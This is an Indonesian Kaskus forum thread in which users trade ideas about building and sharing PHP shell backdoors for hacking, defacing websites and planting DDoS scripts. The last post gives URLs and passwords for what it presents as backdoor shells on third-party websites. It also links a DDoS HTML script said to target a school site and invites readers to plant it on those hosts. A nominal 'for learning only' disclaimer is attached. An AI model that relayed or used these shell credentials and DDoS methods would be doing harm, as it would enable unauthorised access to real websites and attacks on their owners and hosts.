KASKUS

[Kumpul Yu] Sharing Dan Belajar, Buat Shell BackDoor

oke , permisi agan-agan semua,
saya mau membuka thread buat yang mau saling belajar tentang membuat shell backdoor untuk hacking atau apa pun guna nya untuk anda ,

Spoiler for All About Shell Backdoor:


Contoh Shell yang telah di Encode
Tools Untuk Meng Encode Shell Nya

Mari kita saling belajar , dan saling tukar shell backdoor mentahan
Reserved For Update
paling sebel kalo udah liat progi ngeritik program


Sekuritynya gimana ?? bla bla bla

ane jawab: sekuriti gimana maksud lo?? bisa dijelasin secara rinci?

die jawab : euh yagitu de . . . .




untungnya agan ini bisa ngejelasin


, btw sepi nih , sepertinya gak ada yang tertarik dengan security web `
ane temenin gan

sambil nunggu pnjelasan dan kegunannya gimana
kegunaan nya , banyak gan ,,
bisa untuk deface web , dan lain-lain gan, penjelasan kan sudah ada di atas
Quote:Original Posted By SuryaAdtmaja
kegunaan nya , banyak gan ,,
bisa untuk deface web , dan lain-lain gan, penjelasan kan sudah ada di atas


Bisa untuk "Computer Zombie" utk DDoS kan gan?,bagi caranya dong hihihi
nyimak dulu gan, blm ngerti hack hackan
Quote:Original Posted By ilhambagas


Bisa untuk "Computer Zombie" utk DDoS kan gan?,bagi caranya dong hihihi


Bisa gan , tapi biasa nya kalo untuk DDos rata-rata memakai script sendiri, dan di tanem di web yang udah di tanam shell backdoor gitu
Quote:Original Posted By bhill77
nyimak dulu gan, blm ngerti hack hackan


Monngo gan, silahkan, kumpul, saling belajar
ctrl + D dulu ah..
lom ngerti security web..

taunya security mall..
Quote:Original Posted By nino.hilarious
ctrl + D dulu ah..
lom ngerti security web..

taunya security mall..


security mall nya, jadi web master atau security satpam gan memang nya ??
zaman skrg susah gan cari server hostingan yang lugu

klo pepes udah mainstream, tanam backdoor tanam script ddos, cuma jarang sekali server yg kasih jalan ngirim paket data yg besar
nih gan, sekedar share.. ane mau ngasih skrip2 yang biasa di pake di phpshell a.k.a backdoor php. buat yang pgn nanya2 pm ane aja

Spoiler for c0de:


mungkin gitu aja, CMIIW gan
Quote:Original Posted By SuryaAdtmaja


Bisa gan , tapi biasa nya kalo untuk DDos rata-rata memakai script sendiri, dan di tanem di web yang udah di tanam shell backdoor gitu


Agan tau caranya?,kalau tau PM ye gan
Quote:Original Posted By dewasekarat
zaman skrg susah gan cari server hostingan yang lugu

klo pepes udah mainstream, tanam backdoor tanam script ddos, cuma jarang sekali server yg kasih jalan ngirim paket data yg besar


Bah, kalo hostingan ditanem ddos sih jahat bener, bukan cuma webnya rusak tapi yang sewa hostingan bisa ikut2 kena tuduhan nyerang/ngeddos, bahkan hostingannya juga bisa didepak dari datacenter kalo "ikut" nyerang server laen..
Quote:Original Posted By dewasekarat
zaman skrg susah gan cari server hostingan yang lugu

klo pepes udah mainstream, tanam backdoor tanam script ddos, cuma jarang sekali server yg kasih jalan ngirim paket data yg besar


gak gan, hosting banyak kok , ane aja ada kok ,

Quote:Original Posted By larry.the.cow


Bah, kalo hostingan ditanem ddos sih jahat bener, bukan cuma webnya rusak tapi yang sewa hostingan bisa ikut2 kena tuduhan nyerang/ngeddos, bahkan hostingannya juga bisa didepak dari datacenter kalo "ikut" nyerang server laen..

enggak gan pengertian nya : ente nanem script auto DDoS , nanti jadi pengartian nya , orang yang membuka link tersebut misal nya : http://site.com/ddos.html jadi jika orang membuka link tersebut , otomatis DDos akan terkirim ke target gan

Quote:Original Posted By ilhambagas


Agan tau caranya?,kalau tau PM ye gan


sip gan
Quote:Original Posted By varz.aldy
nih gan, sekedar share.. ane mau ngasih skrip2 yang biasa di pake di phpshell a.k.a backdoor php. buat yang pgn nanya2 pm ane aja

Spoiler for c0de:


mungkin gitu aja, CMIIW gan


wah, boleh dong gan berbagi ilmu nya disini , biar orang pada tau kegunaan dari backdoor itu apa

ini contoh dari shell backdoor : http://www.adigi.fi/tmp/shell.php
contoh shell backdoor lagi : http://www.neocenter.pl/images/stori...s/pscript3.php
pass : idca .
agan yang mau ddos web bisa di tanam script html ddos di web di atas ^

contoh shell buatan saya : http://gaklimdo.com/media/syste/gakindo.php
pass : rahasia
ini hanya untuk pembelajaran ya gan , di mohon untuk mendeface web tersebut / menghancurkan web tersebut

ini contoh script DDOS http://romantic-passion.pl/fuck.html
sebagai contoh saya ngirim ddos ke web sekolahan ya , tapi jangan di contoh ini hanya contoh semata
agan pasti bisa menggunakan nya

Tutorial di thread ini hanya di gunakan untuk ajang pembelajaran semata, tolong jangan merusak / membuat untuk tindak kejahatan